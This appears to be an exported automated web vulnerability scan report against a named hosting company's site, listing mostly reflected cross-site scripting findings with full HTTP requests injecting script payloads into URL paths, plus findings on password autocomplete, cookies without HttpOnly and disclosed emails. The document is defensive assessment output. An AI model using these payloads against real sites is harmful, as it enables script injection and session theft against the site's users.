HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:39:12 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/flash/lsw_product.swf9e2b6"><script>alert(1)</script>bd542982b78"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 321fb"><script>alert(1)</script>fd4b24958c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images321fb"><script>alert(1)</script>fd4b24958c2/lsw2/favicon.ico HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:37:46 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/images321fb"><script>alert(1)</script>fd4b24958c2/lsw2/favicon.ico"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf012"><script>alert(1)</script>a0a86f7335c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/lsw2cf012"><script>alert(1)</script>a0a86f7335c/favicon.ico HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:39:03 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/images/lsw2cf012"><script>alert(1)</script>a0a86f7335c/favicon.ico"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd59"><script>alert(1)</script>60937a1f16e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/lsw2/favicon.ico8cd59"><script>alert(1)</script>60937a1f16e HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:40:31 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/images/lsw2/favicon.ico8cd59"><script>alert(1)</script>60937a1f16e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41aa3"><script>alert(1)</script>dcb5ba34b31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /osdd.xml41aa3"><script>alert(1)</script>dcb5ba34b31 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:37:02 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14027
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/osdd.xml41aa3"><script>alert(1)</script>dcb5ba34b31"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c3b9"><script>alert(1)</script>558b59adc2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xml7c3b9"><script>alert(1)</script>558b59adc2f/lsw_en_bannerhome.xml HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/flash/lsw_banner_hp.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:37:00 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/xml7c3b9"><script>alert(1)</script>558b59adc2f/lsw_en_bannerhome.xml"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e32b9"><script>alert(1)</script>82fe5f5c908 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xml/lsw_en_bannerhome.xmle32b9"><script>alert(1)</script>82fe5f5c908 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/flash/lsw_banner_hp.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:37:55 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/xml/lsw_en_bannerhome.xmle32b9"><script>alert(1)</script>82fe5f5c908"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b337c"><script>alert(1)</script>24844152312 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /enb337c"><script>alert(1)</script>24844152312/shopping-cart/login HTTP/1.1 Host: www.leaseweb.com Connection: keep-alive Referer: https://www.leaseweb.com/en/shopping-cart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:51:42 GMT Server: Apache Status: 404 Not Found Set-Cookie: goBack=0; path=/ Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 14057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/enb337c"><script>alert(1)</script>24844152312/shopping-cart/login"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbddb"><script>alert(1)</script>dc5039635e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/shopping-cartfbddb"><script>alert(1)</script>dc5039635e6/login HTTP/1.1 Host: www.leaseweb.com Connection: keep-alive Referer: https://www.leaseweb.com/en/shopping-cart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:52:24 GMT Server: Apache Status: 404 Not Found Set-Cookie: goBack=0; path=/ Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 13920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="en_link" href="/en/shopping-cartfbddb"><script>alert(1)</script>dc5039635e6/login"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fcd8"><script>alert(1)</script>8190e06220 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/shopping-cart/login8fcd8"><script>alert(1)</script>8190e06220 HTTP/1.1 Host: www.leaseweb.com Connection: keep-alive Referer: https://www.leaseweb.com/en/shopping-cart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:54:24 GMT Server: Apache Status: 404 Not Found Set-Cookie: goBack=0; path=/ Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 13918
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="en_link" href="/en/shopping-cart/login8fcd8"><script>alert(1)</script>8190e06220"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4b9"><script>alert(1)</script>82707070b8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images7c4b9"><script>alert(1)</script>82707070b8a/lsw2/favicon.ico HTTP/1.1 Host: www.leaseweb.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:39:31 GMT Server: Apache Status: 404 Not Found Set-Cookie: goBack=0; path=/ Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 14057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/images7c4b9"><script>alert(1)</script>82707070b8a/lsw2/favicon.ico"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e94b6"><script>alert(1)</script>b002c993ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/lsw2e94b6"><script>alert(1)</script>b002c993ba0/favicon.ico HTTP/1.1 Host: www.leaseweb.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:40:30 GMT Server: Apache Status: 404 Not Found Set-Cookie: goBack=0; path=/ Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 14057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/images/lsw2e94b6"><script>alert(1)</script>b002c993ba0/favicon.ico"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49983"><script>alert(1)</script>73bc73b149d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/lsw2/favicon.ico49983"><script>alert(1)</script>73bc73b149d HTTP/1.1 Host: www.leaseweb.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:42:34 GMT Server: Apache Status: 404 Not Found Set-Cookie: goBack=0; path=/ Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 14059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/images/lsw2/favicon.ico49983"><script>alert(1)</script>73bc73b149d"> ...[SNIP]...
2. Password field with autocomplete enabledpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.leaseweb.com
Path:
/en/shopping-cart/login
Issue detail
The page contains a form with the following action URL:
https://www.leaseweb.com/en/customer/doLogin
The form contains the following password field with autocomplete enabled:
signin[password]
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Request
GET /en/shopping-cart/login HTTP/1.1 Host: www.leaseweb.com Connection: keep-alive Referer: https://www.leaseweb.com/en/shopping-cart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
Request
GET /nl/maatwerk-oplossingen/private-cloud HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/nl/over-ons/klanten User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; symfony=daf9a023172501d53f64bf1ec4e87cf6; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.2.10.1303149626
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=26b04464c768597f65d2b6e22486e70f; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=559d52dfb09784c60535f56fcb605d0c; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nl/over-ons/klanten HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en940ec%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2071b7b58a0/shopping-cart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=155577636.1303149626.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=155577636.311874997.1303148133.1303148133.1303149626.2; __utmc=155577636; __utmb=155577636.1.10.1303149626
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... seweb are adhering to this policy. We have implemented an internal procedure to comply. Our sales team will be happy to consult you on the next steps for requesting additional IPs, please email us at sales@leaseweb.com so we can easily guide you through the next steps.<br \/>\r\n<br \/>\r\n<b>Colocation: <\/b><br \/>\r\nYou currently have the option to order up to 16 IPs with half a rac ...[SNIP]... aseweb are adhering to this policy and have implemented an internal procedure to comply. Our sales team will be happy to consult you on the next steps for requesting additional IPs, please email us at sales@leaseweb.com so we can easily guide you through the next steps.","link":"<a href='#' id='close' onClick=jQuery.facebox.close(); >Close<\/a>","desc" ...[SNIP]...
/** * jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget. * @requires jQuery v1.2 or above * * http://gmarwaha.com/jquery/jcarousellite/ * * Copyright (c) 20 ...[SNIP]... 2 callbacks. The functions will be passed an argument that represents an array of elements that * are visible at the time of callback. * * * @cat Plugins/Image Gallery * @author Ganeshji Marwaha/ganeshread@gmail.com */
(function($) { // Compliant with jquery.noConflict() $.fn.jCarouselLite = function(o) { o = $.extend({ btnPrev: null, btnNext: null,
/** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */
/** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) {
/** * jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget. * @requires jQuery v1.2 or above * * http://gmarwaha.com/jquery/jcarousellite/ * * Copyright (c) 20 ...[SNIP]... 2 callbacks. The functions will be passed an argument that represents an array of elements that * are visible at the time of callback. * * * @cat Plugins/Image Gallery * @author Ganeshji Marwaha/ganeshread@gmail.com */
(function($) { // Compliant with jquery.noConflict() $.fn.jCarouselLite = function(o) { o = $.extend({ btnPrev: null, btnNext: null,
